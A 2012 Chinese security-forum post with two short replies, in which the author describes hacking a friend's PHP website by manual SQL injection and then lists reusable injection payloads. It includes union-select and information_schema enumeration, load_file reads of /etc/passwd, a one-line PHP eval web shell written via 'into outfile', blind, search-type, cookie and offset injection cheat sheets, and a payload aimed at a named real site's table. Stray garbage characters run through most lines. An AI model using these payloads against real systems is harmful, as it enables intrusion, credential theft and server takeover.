找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2885|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~
" q/ I" c! ]. Y让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
" C: b( }2 o0 ]/ H9 w3 O我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
$ S& r6 A' [' W5 m如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)
& X; [1 p5 R" g9 ~% N/ T' H" j1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)
9 N+ E# Z# F% b# O# [0 S这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
/ p: r8 }  I, @' U$ bWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
# X# T0 Y$ T( c, W! J  O/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入* Y, D9 M5 P4 @+ H6 y* ~9 Q
                         1 t( i- p8 ]# K1 M: H5 H# ^7 ^8 K
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,& C6 m; H, w( B* [
3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意* v9 R8 A  {4 V  G; o& H
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息( R9 O0 r2 l; T4 p( E$ T# P
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。9 Z7 i# X+ F  D, y/ B
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,/ g. e3 Q- Y4 i" F
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
0 `" g5 g" M# ?9 A) \4 q我就用的是第二个思路,
4 U2 H' A6 C& e: e提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  : d+ T* u- C* H2 R+ g% z) A
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,
( w4 w2 l, W$ m提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
$ N9 G" [6 S4 N5 L注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
4 I0 l/ C- ]+ z7 i4 c0 c7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????7 c+ J( \0 x/ j' o9 Z
是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
9 \  w- s+ V( Z+ c+ H# l提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
% O% O" r3 n1 T然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,  B! Y0 b  y4 V, g; J. G
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限......+ _6 ]; l) D$ @/ Q! _
下面是一些很普遍注入方式资料:
3 w: ~0 g2 l6 G+ K/ G6 {注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='$ R! T; U& {* [, C2 ?2 m. F
拆半法# k) Q, O1 |, j( B  L9 |9 z
######################################
) r/ R5 c# w0 }. ?and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。, Q, L7 t; r" |$ c  T8 t6 U3 m8 j
and exists (select * from admin)
$ w* H; w' p$ Fand exists(select id from admin)
. D0 V% b1 Y: b) I! Q& k4 Aand exists(select id from admin where id=1)
; A9 q* m' D. t. s& o2 K( tand exists(select id from admin where id>1) ' C; w+ R/ E( ^" L
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
6 s9 h, ?) t# ?and exists (select username from admin)1 r* S) ^; T& X2 q4 W
and exists (select password from admin)7 X( j  F5 \) b1 P
and exists (select id from admin where len(username)<10 and id=1)
( |' q$ ~0 W% L- w! Dand exists (select id from admin where len(username)>5 and id=1)# b  Q* I! Z0 H; w7 ?- j# t; |
and exists (select id from admin where len(username)=6 and id=1)
$ V& {. H9 t  F. y+ a2 xand exists (select id from admin where len(password)<10 and id=1)4 p: D, K4 R$ X: y
and exists (select id from admin where len(password)>5 and id=1)7 M# ]5 S+ V( s: U. {, ^1 A
and exists (select id from admin where len(password)=7 and id=1)/ J# C+ K2 e9 g* a) ^
and (select top 1 asc(mid(username,1,1)) from admin)=97. z9 ]: ]0 G2 J+ @: m# A
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
+ N4 w4 W7 ^5 S, ?' T! Z# n猜第二位把username,1,1改成username,2,1就可以了。
/ O" }' o2 K* b. ^0 j1 r' S猜密码把username改成password就OK了
0 S3 {6 {! c- O) p& C##################################################
' L3 ]% z5 J3 {5 J3 L8 X. Q9 t6 F. i搜索型注入, x) [/ K! U; J8 c+ y. U, b
##################################. d' q# B+ c; u
%' and 1=1 and '%'='
; w1 Y+ M9 z% {  X%' and exists (select * from admin) and '%'='$ O3 ^$ f. T# i: S- i
%' and exists(select id from admin where id=1) and '%'='
5 q; ?) n* [0 ~- a%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
8 k" Y6 ?3 ]% a5 |( c%' and exists (select id from admin where len(password)=7 and id=1) and '%'='
! T5 j3 W" ?0 D$ j: e%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
; w* V  [( ^; v7 o" u这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='; B$ q) b5 V/ a4 i* t' N
对于MSSQL数据库,后面可以吧 and '%'='换成--. {; s7 d& N  e- `4 N% [; d
还有一点搜索型注入也可以使用union语句。
1 `4 q# W0 M; M/ T########################################################) p4 {' O; L4 l2 }0 B
联合查询。
* c2 r; D  ?' [# P+ P#####################################
4 \* A3 o' ]; R# _1 Gorder by 10
0 A- E- o3 P( I2 ^) Mand 1=2 union select 1,2,3,4,5,6,7,8,9,105 r7 z1 ~& V# [$ Z% P. p
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
& P+ j" b. H! O7 \% {6 ~and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
+ X) w  @) G: N- n很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
  x" x  ~9 s0 ~###################################
- Z* x" }% P6 C: b; A. ]- T  N; hcookie注入  ]1 @  N& y# Y2 Z8 O
###############################: l4 [& A! c/ {) r4 f
http://www.******.com/shownews.asp?id=127
, y( {. x! L, @http://www.******.com/shownews.asp
% q6 i. s* N, `alert(="id="+escape("127"));
' f9 R3 {4 [) ralert(="id="+escape("127 and 1=1"));8 }- A7 S& p' h' o# v7 R; V4 ~- j0 b
alert(="id="+escape("127 order by 10"));% Y8 K! U1 Y5 t% U% y) e# T
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
, n+ y, k5 |/ Falert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));3 I! P# l! ]# `8 d4 w, i5 Y( V
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。" Y8 e$ S7 g1 @/ L4 Z
###################################
  R# g: I# w1 A- T2 W! t) F9 y偏移注入% A7 G, Y4 H. }, m
###########################################################: w8 e4 A0 |6 U) D. A
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
# p8 w7 u. R. H$ ^% Y+ i9 q- Uunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
/ p; X7 D4 M  M/ J6 x5 `8 \, Funion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
7 V& w- e- n( }  @: v0 qunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)5 X  z7 w, P5 m
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
- h% Z1 W" Y- V' J! a6 u- }, runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
7 N& |' U" ~7 O8 [9 F0 [union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
" E% h8 @& b2 e. k; |a.id=d.id)/ o4 V$ f6 x+ `9 Z4 z
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
- a  K2 L4 P& s* }1 J1 cand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) & c' S" C. _5 P# C; C! N3 [" X  n
  5 q/ _7 z, ]) }' ?2 F$ I
============================================================================================================
. J+ {6 F6 V7 a& f; l1.判断版本
' n0 C- L% Y) nand ord(mid(version(),1,1))>519 z& X5 i3 G: v9 j
返回正常,说明大于4.0版本,支持ounion查询% g6 a5 }; @6 w3 g! `$ p8 m6 s
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
* t, {- M: P' k( fand 2=4 union select 1,2,3,4,5,6,7,8,9--
" L/ I* f- N" i  W. _3.查看数据库版本及当前用户,
" }+ J! _$ z/ @  G5 [and 2=4 union select 1,user(),version(),4,5,6,7,8,9--; `4 t3 W% a( e, W. ~$ T
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,  f$ v; j- g, H$ k/ ~9 P: F- J
4.判断有没有写权限* o" d8 q8 G/ W) c
and (select count(*) from MySQL.user)>0-- " p5 ^: L' |# g6 ]2 c
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
! S7 p+ U0 O2 K- E/ ^5 R- {用不了这个命令,就学习土耳其黑客手法,如下
2 c- K+ |: |9 M: s) Iand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
1 A" l) n9 Z& }$ Q3 l/ f% j( c/ P6.爆表,爆库+ P! q' O, A5 @$ E: ?( D
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--/ c" h1 T; \( F( g! ^
7.爆列名,爆表
/ Y' b3 B5 b$ o4 ^and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
. u$ J- k9 u" s* L& h+ @- b! B8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
# x7 b0 o+ G# Fand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--, }9 |( e; @% \4 N6 N+ J0 }
9.爆字段内容! M7 n( _( o! K( l9 }# |5 `
and+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--. D- b0 _* u  k
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表